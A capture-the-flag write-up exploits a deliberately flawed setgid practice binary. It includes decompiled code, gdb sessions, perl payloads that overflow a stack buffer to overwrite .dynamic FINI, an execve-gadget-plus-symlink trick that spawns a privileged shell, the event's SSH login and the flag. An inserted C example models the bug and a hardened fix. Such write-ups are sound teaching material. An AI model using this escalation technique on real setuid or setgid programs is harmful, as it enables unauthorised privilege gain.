Category: pwnables
It seems like AED also has some plans to raise a hacker force!
We found this binary as an exploitation practice program in the office, but they forgot to remove the setgid flag from the program.
So we can get the secret key!
ssh username@a5.amalgamated.biz
Username: exp_1
Password: jNKpzFuRLpsIW9xzqNIpCVF1
Summary: .dynamic->FINI overwriting, execl symlink
This is the only function of the program (main only does atoi of the 2nd and 3rd arguments):
void __cdecl sub_8048575(const char *argv1, int argv2atoi, size_t argv3atoi)
{
  char v3;   // [sp+10h] [bp-5Ch]@2  -- start of a 64-byte buffer
  size_t v4; // [sp+50h] [bp-1Ch]@2  -- sits right after the buffer, later used as a pointer

  if ( argv3atoi <= 71 )
  {
    v4 = argv3atoi;
    strncpy(&v3, argv1, argv3atoi);  // up to 71 bytes into a 64-byte buffer: overwrites v4
    if ( v4 )
      *(int *)v4 = argv2atoi;        // argv2 is written to the (now attacker-controlled) address
    exit(0);
  }
}
Ok, we can overwrite the v4 variable: v3 lives at bp-0x5c and v4 at bp-0x1c, 64 bytes apart, so any length between 65 and 71 reaches it. Because v4 is then used as a pointer, we get a write to an arbitrary address. What should we overwrite? One of my tools showed that .dtors is a bad choice, but luckily, .dynamic->FINI is fine:
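To make the bug in sub_8048575 concrete from the defender's side, here is an added C example (not code from the binary or from the write-up) that models the frame layout as a struct and puts the original length check beside a hardened one. The struct, function names and sample input are constructed for this example; it assumes a little-endian host, and it returns the overwritten value instead of writing through it.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the vulnerable stack frame from the decompiled sub_8048575:
 * the 64-byte buffer (bp-0x5c) is immediately followed by the size_t
 * (bp-0x1c) that the code later dereferences as a write pointer.
 * Constructed for this example; the layout mirrors the decompiler's
 * offsets, the names are not from the binary. */
struct frame {
    char buf[64];
    uintptr_t ptr;      /* stands in for v4 */
};

/* Same check as the original: any len <= 71 is accepted although the buffer
 * holds only 64 bytes. Instead of writing through ptr afterwards, this
 * version returns ptr's value so the corruption can be observed safely. */
uintptr_t vulnerable_copy(struct frame *f, const char *src, size_t len)
{
    char *dst = (char *)f;          /* same address as f->buf (first member) */
    if (len > 71)
        return 0;
    f->ptr = (uintptr_t)len;
    strncpy(dst, src, len);         /* bounded by caller-supplied len, not by sizeof buf */
    return f->ptr;
}

/* Hardened form: the bound comes from the destination, not from argv, and the
 * copy is always NUL-terminated. Returns 0 on success, -1 if src would not fit. */
int hardened_copy(struct frame *f, const char *src, size_t len)
{
    if (len >= sizeof f->buf)
        return -1;
    f->ptr = (uintptr_t)len;
    memcpy(f->buf, src, len);
    f->buf[len] = '\0';
    return 0;
}

/* Constructed input shaped like the one in the write-up: 64 filler bytes
 * followed by the 4-byte little-endian address 0x08049708 (.dynamic FINI).
 * Returns the input length (68), or 0 if the output buffer is too small. */
size_t build_sample(char *out, size_t cap)
{
    const char addr[4] = { 0x08, (char)0x97, 0x04, 0x08 };
    if (cap < 69)
        return 0;
    memset(out, 'A', 64);
    memcpy(out + 64, addr, 4);
    out[68] = '\0';
    return 68;
}

/* Runs the original check on the sample and reports what ptr became. */
uintptr_t demo_vulnerable(void)
{
    char in[80];
    struct frame f;
    size_t len = build_sample(in, sizeof in);
    memset(&f, 0, sizeof f);
    return vulnerable_copy(&f, in, len);
}

/* Runs the hardened check with a chosen length against the same sample. */
int demo_hardened(size_t len)
{
    char in[80];
    struct frame f;
    build_sample(in, sizeof in);
    memset(&f, 0, sizeof f);
    return hardened_copy(&f, in, len);
}

int main(void)
{
    printf("vulnerable: ptr after 68-byte copy = 0x%lx (was 68)\n",
           (unsigned long)demo_vulnerable());
    printf("hardened:   68 bytes -> rc %d, 10 bytes -> rc %d\n",
           demo_hardened(68), demo_hardened(10));
    return 0;
}
```

The original check bounds the copy by argv[3], which the caller controls, instead of by the buffer; with 68 bytes the future pointer takes the value 0x08049708 exactly as in the write-up. Fixing the copy is the real remedy, but the chosen write target is a separate weakness: a binary linked with -Wl,-z,relro has .dynamic remapped read-only after loading, so FINI would not be writable even with the overflow present.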
exploitme $ elfinfo exploitme
Info for 'exploitme':
i DYNAMIC SECTION: 0x80496f4 RW
+ DYNAMIC most probably IS writeable at runtime
i FINI: 0x8049708
- STACK IS NOT executable
i DTORS 0x80496e8 WA, next 0x80496ec [ffffffff00000000]
- DTORS are not working, bad style found
So, we will overwrite 0x8049708 with whatever we want. Let's put something there and look at what arguments are passed:
exp_1@a5:~$ ulimit -s unlimited # disable libc ASLR
exp_1@a5:~$ gdb --args /opt/pctf/exploit/exploitMe "`perl -e 'print "A"x64 . "\x08\x97\x04\x08";'`" "`perl -e 'print 0x41424344'`" 71
(gdb) r
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) x/20xw $esp
0xbfefbcbc:     0x4000e226      0x4001c4e4      0x00000000      0x00000000
(gdb) x/1s 0x4001c4e4
0x4001c4e4 <_rtld_global+1220>:  ""
Oh no, an empty string :( Luckily, there are a lot of gadgets calling execve in libc, and I found an appropriate one:
(gdb) x/2i &execl-12
   0x400bcb54 <execle+324>:     mov    %eax,(%esp)
   0x400bcb57 <execle+327>:     call   0x400bc870 <execve>
(gdb) p/x $eax
$1 = 0x41424344
(gdb) x/1s &execl-12
0x400bcb54 <execle+324>:  "\211\004$\350\024\375\377\377뇐\220UW VS\201\354\030\020"
Since eax holds the address we jumped to, execve's path argument is the gadget's own bytes read as a string. Ok, so now we just create a symlink with that name pointing to /bin/sh (no arguments are passed to it, so no wrapper is needed), and run the exploit:
exp_1@a5:~$ ln -s /bin/sh $'\211\004$\350\024\375\377\377뇐\220UW VS\201\354\030\020'
exp_1@a5:~$ /opt/pctf/exploit/exploitMe "`perl -e 'print "A"x64 . "\x08\x97\x04\x08";'`" "`perl -e 'print 0x400bcb54'`" 71
$ id
uid=6001(exp_1) gid=1007(expusers) egid=1008(expkey) groups=1007(expusers)
$ cat /opt/pctf/exploit/key
K3Ys_t0_15_M1nUtEs_0f_F4mE
The flag: K3Ys_t0_15_M1nUtEs_0f_F4mE
2 comments
Many thanks for the exploit write-up =)
Please tell us about the solutions to tasks 2 (Mystery Puzzle 9000), 30 (Sticky Note) and 36 (I'M HUNGRY!..as hell).
On 2 and 30 we failed completely at the recognition, nothing works. And on 36 the problem is apparently with our hearing. We got a 3-second music clip, but couldn't make out what is being sung, something like "fuck you ever fuck fuck you", but the system wouldn't accept that as an answer.
awesome write up !